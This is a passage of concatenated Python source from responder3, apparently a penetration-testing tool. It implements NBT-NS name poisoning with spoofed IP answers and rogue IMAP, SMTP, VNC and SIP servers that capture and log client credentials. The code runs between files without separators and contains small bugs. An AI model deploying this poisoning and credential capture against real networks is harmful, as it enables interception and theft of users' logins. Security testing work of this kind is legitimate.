			elif self.session.current_state == SMTPServerState.AUTHENTICATED:
				if cmd.command == SMTPCommand.MAIL:
					self.session.emailFrom = cmd.emailaddress
					await asyncio.wait_for(
						self.send_data(SMTPReply.construct(250).to_bytes()),
						timeout=1)
					continue

				elif cmd.command == SMTPCommand.RCPT:
					self.session.emailTo.append(cmd.emailaddress)
					await asyncio.wait_for(
						self.send_data(SMTPReply.construct(250).to_bytes()),
						timeout=1)
					continue

				elif cmd.command == SMTPCommand.DATA:
					# we get data command, switching current_state and sending a reply to client can send data
					if cmd.emaildata is None:
						await asyncio.wait_for(
							self.send_data(SMTPReply.construct(354).to_bytes()),
							timeout=1)
						continue
					else:
						em = EmailEntry()
						em.email = self.session.emailparser.parsestr(cmd.emaildata)
						em.fromAddress = self.session.emailFrom  # string
						em.toAddress = self.session.emailTo  # list
						await self.logger.email(em)
						await asyncio.wait_for(
							self.send_data(SMTPReply.construct(250).to_bytes()),
							timeout=1)
						continue
				else:
					await asyncio.wait_for(
						self.send_data(SMTPReply.construct(503).to_bytes()),
						timeout=1)
					return

			else:
				await asyncio.wait_for(
					self.send_data(SMTPReply.construct(503).to_bytes()),
					timeout=1)
				return



#https://tools.ietf.org/html/rfc6143

import enum
import io

from responder3.core.commons import *
from responder3.core.logging.log_objects import Credential
from responder3.core.asyncio_helpers import *

class VNCSessionStatus:
	PROTOCOL_EXCH = 0
	SECURITY = 1
	AUTHENTICATION = 2
	AUTHORISED = 3
	

class VNCSecurityTypes(enum.Enum):
	INVALID = 0
	NONE = 1
	VNC_AUTHENTICATION = 2
	
class SecurityResultHandshakeStatus(enum.Enum):
	OK = 0
	FAILED = 1

class ProtocolVersion:
	def __init__(self):
		self.protocolversion = None #RFB 003.008\n
		
	def to_bytes(self):
		return self.protocolversion.encode()
		
	@staticmethod
	def from_bytes(data):
		return ProtocolVersion.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		pv = ProtocolVersion()
		pv.protocolversion = buff.read(12).decode()
		return pv
	
	
class SecurityHandshake:
	def __init__(self):
		self.security_types_len = None #1 byte
		self.security_types = None #security_types_len bytes, list of VNCSecurityTypes enum
		
	def to_bytes(self):
		t = len(self.security_types).to_bytes(1, byteorder = 'big', signed = False)
		for st in self.security_types:
			t += st.value.to_bytes(1, byteorder = 'big', signed = False)
		return t
		
class SecurityHandshakeResponse:
	def __init__(self):
		self.security_type = None #1 byte, VNCSecurityTypes
		
	@staticmethod
	def from_bytes(data):
		return SecurityHandshakeResponse.from_buffer(io.BytesIO(data))
		
	@staticmethod
	def from_buffer(buff):
		t = SecurityHandshakeResponse()
		try:
			t.security_type = VNCSecurityTypes(buff.read(1)[0])
		except Exception as e:
			#reason for this exception: some uber-smart VNC clients have extended the RFC without telling anyone
			t.security_type = None
		return t
		
class SecurityResultHandshake:
	def __init__(self):
		self.status = None #SecurityResultHandshakeStatus
		self.err_reason = 'Not supported!'
		
	def to_bytes(self):
		if self.status == SecurityResultHandshakeStatus.OK:
			return self.status.value.to_bytes(1, byteorder = 'big', signed = False)
		else:
			edata = self.err_reason.encode()
			data = self.status.value.to_bytes(1, byteorder = 'big', signed = False)
			data += len(edata).to_bytes(4, byteorder = 'big', signed = False)
			data += edata
			return data
		
class VNCAuthentication:
	def __init__(self):
		self.challenge = None #16 bytes random
		
	def to_bytes(self):
		return self.challenge
		
class VNCAuthenticationResult:
	def __init__(self):
		self.response = None #16 bytes, encrypted server random with password DES!
		
	@staticmethod
	def from_bytes(data):
		return VNCAuthenticationResult.from_buffer(io.BytesIO(data))
		
	@staticmethod
	def from_buffer(buff):
		t = VNCAuthenticationResult()
		t.response = buff.read(16)
		return t

class VNCMessageParser:
	def __init__(self, session):
		self.session = session
		
	async def from_streamreader(self, reader, timeout = 1):
		if self.session.status == VNCSessionStatus.PROTOCOL_EXCH:
			data = await readexactly_or_exc(reader, 12)
			return ProtocolVersion.from_bytes(data)	
			
		elif self.session.status == VNCSessionStatus.SECURITY:
			data = await readexactly_or_exc(reader, 1)
			return SecurityHandshakeResponse.from_bytes(data)	
		
		elif self.session.status == VNCSessionStatus.AUTHENTICATION:
			data = await readexactly_or_exc(reader, 16)			
			return VNCAuthenticationResult.from_bytes(data)
			
		
		
		
		
		
		
		
			


from responder3.protocols.authentication.common import *
from responder3.protocols.authentication.CRAM import *
from responder3.protocols.authentication.DIGEST import *
from responder3.protocols.authentication.BASIC import BASIC
from responder3.protocols.authentication.SASL import *
from responder3.protocols.authentication.NTLM import NTLMAUTHHandler

from responder3.protocols.authentication_providers.dictauth import DictAuth
from responder3.protocols.authentication_providers.fileauth import FileAuth
from responder3.protocols.authentication_providers.common import *

class AuthMechaLoader:
	def __init__(self):
		pass

	@staticmethod
	def from_dict(d):
		mecha = AuthMecha(d['auth_mecha'].upper())
		credential_provider = DictAuth()
		credential_provider.setup_defaults()
		if 'credentials_provider' in d:
			credential_provider = credprov2class[d['credentials_provider']['name'].upper()]()
			if 'settings' in d['credentials_provider']:
				credential_provider.setup(d['credentials_provider']['settings'])
			else:
				credential_provider.setup_defaults()
		
		auth_obj = authmecha2class[mecha]( credential_provider)
		if 'settings' in d:
			auth_obj.setup(d['settings'])
		else:
			auth_obj.setup_defaults()
		return mecha, auth_obj

	@staticmethod
	def from_json(self, data):
		return AuthMechaLoader.from_dict(json.loads(data))


authmecha2class = {
	AuthMecha.BASIC : BASIC,
	AuthMecha.CRAM : None,
	AuthMecha.DIGEST : DIGEST,
	AuthMecha.SASL : None,
	AuthMecha.NTLM : NTLMAUTHHandler,
}

credprov2class = {
	CredProvider.DICT : DictAuth,
	CredProvider.FILE : FileAuth,
}


import re
import socket
import struct
import logging
import asyncio
import ipaddress
import traceback
import collections

from responder3.core.sockets import setup_base_socket
from responder3.core.commons import PoisonerMode, ResponderPlatform
from responder3.protocols.NetBIOS import * 
from responder3.core.servertemplate import ResponderServer, ResponderServerSession, ResponderServerGlobalSession


class NBTNSGlobalSession(ResponderServerGlobalSession):
	def __init__(self, listener_socket_config, settings, log_queue):
		ResponderServerGlobalSession.__init__(self, log_queue, self.__class__.__name__)
		self.listener_socket_config = listener_socket_config
		self.settings = settings

		self.spooftable = collections.OrderedDict()
		self.poisonermode = PoisonerMode.ANALYSE

		self.parse_settings()

	def parse_settings(self):
		if self.settings is None:
			return
		else:
			# parse the poisoner mode
			if isinstance(self.settings['mode'], str):
				self.poisonermode = PoisonerMode[self.settings['mode'].upper()]

			# compiling re strings to actual re objects and converting IP strings to IP objects
			if self.poisonermode == PoisonerMode.SPOOF:
				for entry in self.settings['spooftable']:
					for regx in entry:
						self.spooftable[re.compile(regx)] = ipaddress.ip_address(entry[regx])


class NBTNSSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)


class NBTNS(ResponderServer):
	@staticmethod
	def custom_socket(server_properties):
		sock = setup_base_socket(server_properties, bind_ip_override = ipaddress.ip_address('0.0.0.0'))
		sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
		return sock

	def init(self):
		self.parser = NBTNSPacket

	async def parse_message(self):
		msg = await asyncio.wait_for(self.parser.from_streamreader(self.creader), timeout=1)
		return msg

	async def send_data(self, data, addr = None):
		await asyncio.wait_for(self.cwriter.write(data, addr), timeout=1)
		return

	async def run(self):
		try:
			msg = await asyncio.wait_for(self.parse_message(), timeout=1)
			if self.globalsession.poisonermode == PoisonerMode.ANALYSE:
				for q in msg.Questions:
					await self.logger.poisonresult(self.globalsession.poisonermode, requestName = q.QNAME.name, request_type = q.QTYPE.name)

			else: #poisoning
				answers = []
				for q in msg.Questions:
					for spoof_regx in self.globalsession.spooftable:
						spoof_ip = self.globalsession.spooftable[spoof_regx]
						if spoof_regx.match(q.QNAME.name.lower().strip()):
							await self.logger.poisonresult(self.globalsession.poisonermode, requestName = q.QNAME.name, poisonName = str(spoof_regx), poisonIP = spoof_ip, request_type = q.QTYPE.name)
							res = NBResource()
							res.construct(q.QNAME, NBRType.NB, spoof_ip)
							answers.append(res)
							break
						else:
							await self.logger.poisonresult(self.globalsession.poisonermode, requestName = q.QNAME.name, request_type = q.QTYPE.name)
				
				if anwers == []:
					return
				response = NBTNSPacket()
				response.construct(
					 TID = msg.NAME_TRN_ID, 
					 response = NBTSResponse.RESPONSE, 
					 opcode   = NBTNSOpcode.QUERY, 
					 nmflags  = NBTSNMFlags.AUTHORATIVEANSWER | NBTSNMFlags.RECURSIONDESIRED, 
					 answers  = answers
				)

				await asyncio.wait_for(self.send_data(response.to_bytes()), timeout =1)

		except Exception as e:
			raise e


import platform
import ipaddress
import socket
from responder3.core.sockets import SocketConfig

from responder3.core.interfaces.darwin import get_darwin_ifaddrs
from responder3.core.interfaces.linux import get_linux_ifaddrs
from responder3.core.interfaces.windows import get_win_ifaddrs

class NetworkInterfaces:
    def __init__(self):
        """
        Provides a platform-independent way of enumerating all available interfaces and IP addresses on the host
        """
        self.interfaces = self.enumerate_interfaces()
        self.name_ip_lookup = {}
        self.ip_name_lookup = {}
        self.iface_help = ''
        
        # creating lookup tables, and help string to display on help menu
        self.generate_lookups_and_help(self.interfaces)

    def enumerate_interfaces(self):
        """
        Enumerates all interfaces on host
        :return: None
        """
        if platform.system() == 'Windows':
            return get_win_ifaddrs()
        if platform.system() == 'Linux':
            return get_linux_ifaddrs()
        if platform.system() == 'Darwin':
            return get_darwin_ifaddrs()

    def store_ip_for_interface(self, iface, ip):
        if (iface, ip.version) not in self.name_ip_lookup:
            self.name_ip_lookup[(iface, ip.version)] = []
        self.name_ip_lookup[(iface, ip.version)].append(ip)

    def store_interface_to_ip(self, iface, ip):
        if ip in self.ip_name_lookup:
            print('Multiple interface found with the same IPv4 address! You will need to specify interface name in config')
            return
        self.ip_name_lookup[ip] = iface

    def generate_lookups_and_help(self, interfaces):
        """
        Generates lookup dictionaries and a formatted string describing all interfaces and addresses
        :return: None
        """
        self.iface_help += 'NAME\tIPv4\t\tIPv6\r\n'
        for iface in interfaces:
            addresses = [str(ip) for ip in interfaces[iface].addresses]
            self.iface_help += '\t'.join([iface, ','.join(addresses), '\r\n'])

            for ip in interfaces[iface].addresses:
                self.store_ip_for_interface(iface, ip)
                self.store_interface_to_ip(iface, ip)

    def get_ifname(self, ip):
        """
        Returns interface name belonging to the IP address provided in ip
        :param ip: IP address to search the interface for
        :type ip: ipaddress.IPv4Address or ipaddress.IPv6Address
        :return: str
        """
        return self.ip_name_lookup.get(str(ip), None)

    def get_ip(self, ifname, ipversion = 4):
        """
        Returns version 4 or 6 ip addresses for the interface specified by ifname.
        :param ifname: Name of the interface
        :type ifname: str
        :param ipversion: Specified ip address version to return
        :type ipversion: int
        :return: list
        """
        return self.name_ip_lookup.get((ifname, ipversion), None)

    def get_socketconfig_from_ip(self, ip, port, protocol):
        """
        Returns a SocketConfig object for the given ip, port, protocol
        :param ip: IP address belonging to an existing interface
        :param port: port numer
        :param protocol: protocol type
        :type protocol: socket.SOCK_STREAM or socket.SOCK_DGRAM
        :return: SocketConfig
        """
        sc = SocketConfig()
        sc.bind_port = int(port)
        if isinstance(ip, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
            sc.bind_addr = ip
        else:
            sc.bind_addr = ipaddress.ip_address(ip)

        sc.bind_family = sc.bind_addr.version

        if isinstance(protocol, str):
            if protocol.lower() == 'tcp':
                sc.bind_protocol = socket.SOCK_STREAM
            elif protocol.lower() == 'udp':
                sc.bind_protocol = socket.SOCK_DGRAM
            else:
                raise Exception('Unknown protocol definition %s' % protocol)
        elif isinstance(protocol, int):
            sc.bind_protocol = protocol
        else:
            raise Exception('Unknown protocol definition %s' % protocol)

        sc.bind_iface = self.ip_name_lookup[sc.bind_addr]
        sc.bind_iface_idx = self.interfaces[sc.bind_iface].ifindex

        return sc

    def get_ivs(self, ipversion):
        if ipversion is None:
            return [4, 6]
        if isinstance(ipversion, list):
            return ipversion
        if int(ipversion) in [4,6]:
             return [int(ipversion)]
        else:
            raise Exception('Unknown IP version %s' % repr(ipversion))

    def get_protocol(self, protocol):
        if isinstance(protocol, int):
            return protocol
        if isinstance(protocol, str):
            if protocol.lower() == 'tcp':
                return socket.SOCK_STREAM
            elif protocol.lower() == 'udp':
                return socket.SOCK_DGRAM
        raise Exception('Unknown protocol definition %s' % protocol)

    def get_sc(self, ifname, address, port, protocol, server):
        sc = SocketConfig()
        sc.bind_port = int(port)
        sc.bind_addr = address
        sc.bind_family = sc.bind_addr.version
        sc.bind_protocol = self.get_protocol(protocol)
        sc.bind_iface = ifname
        sc.bind_iface_idx = self.interfaces[sc.bind_iface].ifindex
        sc.is_server = server
        return sc

    def get_client_socketconfig(self, ifname, protocol, ipversion = None, reuse_address = False, reuse_port= False):
        if ifname not in self.interfaces:
            raise Exception('Could not find ifname %s!' % ifname)

        scl = []

        for version in self.get_ivs(ipversion):
            for lookup_ifname, ver in self.name_ip_lookup:
                if ifname != lookup_ifname:
                    continue
                if ver != version:
                    break
                for address in self.name_ip_lookup[(lookup_ifname, ver)]:
                    sc = self.get_sc(ifname, address, 0, protocol, False)
                    sc.reuse_address = reuse_address
                    sc.reuse_port = reuse_port
                    scl.append(sc)

        return scl
       
    def get_socketconfig(self, ifname, port, protocol, ipversion = None):
        """
        Returns a list of socketconfig objects to create server.
        :param ifname: Interface name
        :type ifname: str
        :param port: Port number
        :type port: int
        :param protocol: Protocol type
        :type protocol: str or int or socket.SOCK_STREAM/socket.SOCK_DGRAM
        :param ipversion: IP address version
        :return: list of SocketConfig
        """
        if ifname not in self.interfaces:
            raise Exception('Could not find ifname %s!' % ifname)

        scl = []

        for lookup_ifname, ver in self.name_ip_lookup:
            for version in self.get_ivs(ipversion):
                if ifname != lookup_ifname:
                    continue
                if ver != version:
                    break
                for address in self.name_ip_lookup[(lookup_ifname, ver)]:
                    sc = self.get_sc(ifname, address, port, protocol, True)
                    scl.append(sc)

        return scl

    def __str__(self):
        return self.iface_help

interfaces = NetworkInterfaces()




import traceback
import logging
import io
import sys
import json
import asyncio
import datetime

from responder3.core.commons import *

class LogMsg:
	def __init__(self, src, level, msg, timestamp = datetime.datetime.utcnow()):
		self.src = src
		self.level = level
		self.msg = msg
		self.timestamp = timestamp
		
	def to_dict(self):
		t = {}
		t['src'] = self.src
		t['level'] = self.level
		t['msg'] = self.msg
		t['timestamp'] = self.timestamp
		return t
		
	@staticmethod
	def from_dict(self, d):
		m = LogMsg()
		m.src = d['src']
		m.level = d['level']
		m.msg = d['msg']
		m.timestamp = d['timestamp']
		return m
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls = UniversalEncoder)
		
	@staticmethod
	def from_json(self, data):
		return LogMsg.from_dict(json.loads(data))
		
"""
temporary class to be able to use the original logtask for logging,
should be changed 
TODO
"""
class R3LogTaskConsumer:
	def __init__(self, logQ):
		self.logQ = logQ

	async def process_log(self, lm):
		await self.logQ.put(LogEntry(lm.level, lm.src, lm.msg))
		
class Logger:
	def __init__(self, name, logger = None, logQ = None, level = logging.DEBUG):
		self.level = level
		self.logQ = logQ if logQ is not None else asyncio.Queue()
		self.consumers = {}
		self.logger = logger
		self.name = name
		
	async def run(self):
		try:
			while True:
				level, msg = await self.logQ.get()
				await self.handle_logger(level, msg)
				await self.handle_consumers(level, msg)
		
		except Exception as e:
			print('Logger run exception! %s' % e)
			
	async def handle_logger(self, level, msg):
		if self.logger:
			await self.logger.log(level, msg)
			return
		print('%s %s %s %s' % (datetime.datetime.utcnow().isoformat(), self.name, level, msg))
		
	async def handle_consumers(self, level, msg):
		try:
			lm = LogMsg(self.name, level, msg)
			for consumer in self.consumers:
				await consumer.process_log(lm)
		except Exception as e:
			print(e)
			
	async def debug(self, msg):
		await self.logQ.put((logging.DEBUG, msg))
		
	async def info(self, msg):
		await self.logQ.put((logging.INFO, msg))
	
	async def exception(self, message = None):
		sio = io.StringIO()
		ei = sys.exc_info()
		tb = ei[2]
		traceback.print_exception(ei[0], ei[1], tb, None, sio)
		msg = sio.getvalue()
		if msg[-1] == '\n':
			msg = msg[:-1]
		sio.close()
		if message is not None:
			msg = '%s : %s' % (message,msg)
		await self.logQ.put((logging.ERROR, msg))
			
	async def error(self, msg):
		await self.logQ.put((logging.ERROR, msg))
		
	async def warning(self, msg):
		await self.logQ.put((logging.WARNING, msg))
		
	async def log(self, level, msg):
		await self.logQ.put((level, msg))
		
	def add_consumer(self, consumer):
		self.consumers[consumer] = 0
		
	def del_consumer(self, consumer):
		if consumer in self.consumers:
			del self.consumers[consumer]


def r3exception(funct):
	"""
	Decorator for handling exceptions
	"""
	async def wrapper(*args, **kwargs):
		this = args[0] #renaming self to 'this'
		try:
			await funct(*args, **kwargs)
		except Exception as e:
			await this.logger.exception(funct.__name__)
			return
			
	return wrapper


import enum
import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import *
from responder3.core.commons import *
from responder3.protocols.SIP import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.protocols.authentication.loader import *


class SIPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.status = SIPSessionStatus.UNAUTHENTICATED
		self.auth_mecha_name, self.auth_mecha  = AuthMechaLoader.from_dict({'auth_mecha':'DIGEST'})

		self.read_cnt = 0

class SIP(ResponderServer):
	def init(self):
		pass

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		while not self.shutdown_evt.is_set():
			if self.cproto == 'UDP' and self.session.read_cnt > 0:
				# breaking continue in case of UDP, which can be only read once
				return
			self.session.read_cnt += 1

			try:
				result = await asyncio.gather(*[asyncio.wait_for(Request.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				req = result[0]

			if self.session.status == SIPSessionStatus.UNAUTHENTICATED:
				auth_data = None
				if 'authorization' in req.spec_headers:
					auth_line = req.spec_headers['authorization']
					m = auth_line.find(' ')
					if m != -1:
						atype = auth_line[:m]
						auth_data = auth_line[m+1:]

				status, data = self.session.auth_mecha.do_auth(auth_data, method = req.method, body_data = req.data)

				if status == AuthResult.OK or status == AuthResult.FAIL:
					await self.logger.credential(data.to_credential())
				
				if status == AuthResult.OK:
					self.session.status = SIPSessionStatus.AUTHENTICATED
					# TODO: implement this
					# SIP200Resonse
					return
				
				elif status == AuthResult.FAIL:
					self.session.status = SIPSessionStatus.AUTHFAILED
					await self.send_data(SIP403Response().to_bytes())
					return
				
				elif status == AuthResult.CONTINUE:
					rdata = self.session.auth_mecha_name.name
					rdata += ' %s' % data
					
					resp = SIP401Response.from_request(req, rdata)
					data = resp.to_bytes()
					self.cwriter.write(data)
					continue

			else:
				#TODO: continue implementation :)
				return

			return


import enum
import logging
import asyncio
from urllib.parse import urlparse

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.IMAP import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.core.ssl import *


class IMAPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.encoding     = 'utf-7'
		self.parser       = IMAPCommandParser(encoding = self.encoding)
		self.authhandler  = None
		self.supported_versions = [IMAPVersion.IMAP, IMAPVersion.IMAP4rev1]
		self.additional_capabilities = ['STARTTLS']
		self.supported_auth_types = [IMAPAuthMethod.PLAIN]
		self.creds = {} #None will allow everyone in
		self.current_state = IMAPState.NOTAUTHENTICATED
		self.banner = None
		#self.log_data = False
		self.multiauth_cmd_tag = None #this is for storing the original cmd_tag in case of multiauth was performed
		self.ssl_ctx = None

	def __repr__(self):
		t  = '== IMAPSession ==\r\n'
		t += 'encoding:      %s\r\n' % repr(self.encoding)
		t += 'parser: %s\r\n' % repr(self.parser)
		t += 'current_state: %s\r\n' % repr(self.current_state)
		t += 'authhandler: %s\r\n' % repr(self.authhandler)
		return t


class IMAP(ResponderServer):
	def init(self):
		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.session.banner = 'The Microsoft Exchange IMAP4 service is ready.'
		self.session.ssl_ctx = get_default_server_ctx()


	def parse_settings(self):
		if 'banner' in self.settings:
			self.session.banner = self.settings['banner']
		if 'ssl_ctx' in self.settings:
			self.session.ssl_ctx = SSLContextBuilder.from_dict(self.settings['ssl_ctx'])

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		# send hello
		await asyncio.wait_for(
			self.send_data(IMAPOKResp.construct(self.session.banner).to_bytes()),
			timeout = 1
		)
			
		# main loop
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				cmd = result[0]

			if 'R3DEEPDEBUG' in os.environ:
				await self.logger.debug(cmd)
				await self.logger.debug(self.session.current_state)

			if self.session.current_state == IMAPState.MULTIAUTH:
				res, data = self.session.authhandler.do_AUTH(cmd)
				if res == IMAPAuthStatus.MORE_DATA_NEEDED:
						self.session.current_state = IMAPState.MULTIAUTH
						await asyncio.wait_for(
							self.send_data(data),
							timeout = 1
						)
						continue

				elif res == IMAPAuthStatus.OK:
					await self.logger.credential(data)
					self.session.current_state = IMAPState.AUTHENTICATED
					await asyncio.wait_for(
						self.send_data(IMAPOKResp.construct('LOGIN completed', self.session.multiauth_cmd_tag).to_bytes()),
						timeout = 1
					)
					continue
					
				elif res == IMAPAuthStatus.NO:
					await self.logger.credential(data)
					await asyncio.wait_for(self.send_data(
						IMAPNOResp.construct('wrong credZ!', self.session.multiauth_cmd_tag).to_bytes()),
						timeout = 1
					)
					return
				
				else:
					return

			if self.session.current_state == IMAPState.NOTAUTHENTICATED:
				if cmd.command == IMAPCommand.LOGOUT:
					await asyncio.wait_for(
						self.send_data(
							IMAPBYEResp.construct('').to_bytes()),
							timeout = 1
					)
					return

				if cmd.command == IMAPCommand.STARTTLS:
					self.cwriter.pause_reading()
					await asyncio.wait_for(
						self.send_data(IMAPOKResp.construct('Begin TLS negotiation now', cmd.tag).to_bytes()),
						timeout = 1
					)
					await self.switch_ssl(self.session.ssl_ctx)
					continue

				if cmd.command == IMAPCommand.LOGIN:
					self.session.authhandler = IMAPAuthHandler(IMAPAuthMethod.PLAIN, creds= self.session.creds)
					res, data = self.session.authhandler.do_AUTH(cmd)
					if res == IMAPAuthStatus.MORE_DATA_NEEDED:
						await asyncio.wait_for(
							self.send_data(data),
							timeout = 1
						)
						continue

					elif res == IMAPAuthStatus.OK:
						await self.logger.credential(data)
						self.session.current_state = IMAPState.AUTHENTICATED
						await asyncio.wait_for(
							self.send_data(IMAPOKResp.construct('LOGIN completed', cmd.tag).to_bytes()),
							timeout = 1
						)
						continue
					
					else:
						await self.logger.credential(data)
						await asyncio.wait_for(self.send_data(
							IMAPNOResp.construct('wrong credZ!', cmd.tag).to_bytes()),
							timeout = 1
						)
						return

				elif cmd.command == IMAPCommand.AUTHENTICATE:
					self.session.authhandler = IMAPAuthHandler(cmd.auth_type, creds=self.session.creds)
					res, data = self.session.authhandler.do_AUTH(cmd)
					if res == IMAPAuthStatus.MORE_DATA_NEEDED:
						self.session.current_state = IMAPState.MULTIAUTH
						self.session.multiauth_cmd_tag = cmd.tag
						await asyncio.wait_for(
							self.send_data(data),
							timeout = 1
						)
						continue

				elif cmd.command == IMAPCommand.CAPABILITY:
					await asyncio.wait_for(
						self.send_data(
							IMAPCAPABILITYResp.construct(
								self.session.supported_versions,
								self.session.supported_auth_types,
								self.session.additional_capabilities
								).to_bytes()
							), timeout = 1)
					await asyncio.wait_for(
						self.send_data(
							IMAPOKResp.construct('Completed', cmd.tag).to_bytes()),
							timeout = 1
					)
					continue

			if self.session.current_state == IMAPState.AUTHENTICATED:
				raise NotImplementedError
			
			else:
				raise NotImplementedError



import io
import enum
import asyncio

from responder3.protocols.SMB.SMB2 import SMB2Message
from responder3.protocols.SMB.SMB  import SMBMessage

class SMBVersion(enum.Enum):
	V1 = 0xFF
	V2 = 0xFE

class SMBTransport():
	def __init__(self):
		self.zero = None
		self.length = None
		self.smbmessage = None

	@staticmethod
	def from_bytes(bbuff):
		return SMBTransport.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		smbt = SMBTransport()
		smbt.zero       = int.from_bytes(buff.read(1), byteorder='little', signed = False)
		smbt.length     = int.from_bytes(buff.read(3), byteorder='little', signed = False)
		t = buff.read(smbt.length)
		version = SMBVersion(int.from_bytes(t[0], byteorder = 'big', signed = False))
		if version == SMBVersion.V2:
			smbt.smbmessage = SMB2Message.from_bytes(t)
		elif version == SMBVersion.V1:
			smbt.smbmessage = SMBMessage.from_bytes(t)
		else:
			raise Exception('Not SMB traffic!')

		return smbt

	@staticmethod
	async def from_streamreader(reader):
		smbt = SMBTransport()
		t = await asyncio.wait_for(reader.readexactly(1), timeout = None)
		smbt.zero       = int.from_bytes(t, byteorder='big', signed = False)
		t = await asyncio.wait_for(reader.readexactly(3), timeout = None)
		smbt.length     = int.from_bytes(t, byteorder='big', signed = False)
		t = await asyncio.wait_for(reader.readexactly(smbt.length), timeout = None)
		version = SMBVersion(t[0])
		if version == SMBVersion.V2:
			smbt.smbmessage = SMB2Message.from_bytes(t)
		elif version == SMBVersion.V1:
			smbt.smbmessage = SMBMessage.from_bytes(t)
		else:
			raise Exception('Not SMB traffic!')

		return smbt

	@staticmethod
	def construct(smbmessage):
		smbt = SMBTransport()
		smbt.zero       = 0
		smbt.length     = len(smbmessage.to_bytes())
		smbt.smbmessage = smbmessage
		return smbt

	def to_bytes(self):
		t  = self.zero.to_bytes(1, byteorder = 'big', signed=False)
		t += self.length.to_bytes(3, byteorder = 'big', signed=False)
		t += self.smbmessage.to_bytes()
		return t


import enum
import binascii
import datetime
import sys

def wintime2datetime(timeint):
	return datetime.datetime(1601,1,1) + datetime.timedelta(microseconds=(timeint/ 10.))

def dt2wt(dt):
	return int(dt.timestamp() * 10000000.0)


import enum

class AUTHModuleMode(enum.Enum):
	CLIENT = 'CLIENT'
	SERVER = 'SERVER'

class AuthResult(enum.Enum):
	OK = enum.auto() #auth succsess, user is authorized
	FAIL = enum.auto() #auth failed, user creds not okay
	CONTINUE = enum.auto() #auth has multiple septs, more data needed

class AuthMecha(enum.Enum):
	BASIC  = 'BASIC'
	CRAM   = 'CRAM'
	DIGEST = 'DIGEST'
	SASL   = 'SASL'
	NTLM   = 'NTLM'




import enum
import io
import socket
import asyncio
import ipaddress

from responder3.protocols.DNS import * 

#https://tools.ietf.org/html/rfc1035
#https://tools.ietf.org/html/rfc4795
class LLMNRFlags(enum.IntFlag):
	CONFILCT   = 0x40
	TRUNCATION = 0x20
	TENTATIVE  = 0x10
	RESERVED1  = 0x8
	RESERVED2  = 0x4
	RESERVED3  = 0x2
	RESERVED4  = 0x1

class LLMNROpcode(enum.Enum):
	DEFAULT = 0x0000

class LLMNRResponse(enum.Enum):
	REQUEST  = 0
	RESPONSE = 1

class LLMNRPacket():
	def __init__(self):
		self.TransactionID = None
		self.QR = None
		self.Opcode = None
		self.FLAGS = None
		self.Rcode = None
		self.QDCOUNT = None
		self.ANCOUNT = None
		self.NSCOUNT = None
		self.ARCOUNT = None

		self.Questions = []
		self.Answers   = []
		self.Authorities = []
		self.Additionals = []

	async def from_streamreader(reader):
		data = await reader.read()
		return LLMNRPacket.from_bytes(data)

	def from_bytes(bbuff):
		return LLMNRPacket.from_buffer(io.BytesIO(bbuff))

	def from_buffer(buff):
		packet = LLMNRPacket()

		packet.TransactionID = buff.read(2)
		temp = int.from_bytes(buff.read(2), byteorder = 'big', signed=False)

		packet.QR     = LLMNRResponse(temp >> 15)
		packet.Opcode = LLMNROpcode((temp & 0x7800) >> 11) 
		packet.FLAGS  = LLMNRFlags((temp & 0x7F0) >> 4)
		packet.Rcode  = DNSResponseCode(temp & 0xF)

		packet.QDCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed=False)
		packet.ANCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed=False)
		packet.NSCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed=False)
		packet.ARCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed=False)

		
		for i in range(0, packet.QDCOUNT):
			dnsq = DNSQuestion.from_buffer(buff)
			packet.Questions.append(dnsq)

		
		for i in range(0, packet.ANCOUNT):
			dnsr = DNSResourceParser.from_buffer(buff)
			packet.Answers.append(dnsr)

		for i in range(0, packet.NSCOUNT):
			dnsr = DNSResourceParser.from_buffer(buff)
			packet.Authorities.append(dnsr)

		for i in range(0, packet.ARCOUNT):
			dnsr = DNSResourceParser.from_buffer(buff)
			packet.Additionals.append(dnsr)

		return packet
		

	def __repr__(self):
		t = '== LLMNRPacket ==\r\n'
		t+= 'TransactionID:  %s\r\n' % self.TransactionID.hex()
		t+= 'QR:  %s\r\n' % self.QR.name
		t+= 'Opcode: %s\r\n' % self.Opcode.name
		t+= 'FLAGS: %s\r\n' % repr(self.FLAGS)
		t+= 'Rcode: %s\r\n' % self.Rcode.name
		t+= 'QDCOUNT: %s\r\n' % self.QDCOUNT
		t+= 'ANCOUNT: %s\r\n' % self.ANCOUNT
		t+= 'NSCOUNT: %s\r\n' % self.NSCOUNT
		t+= 'ARCOUNT: %s\r\n' % self.ARCOUNT

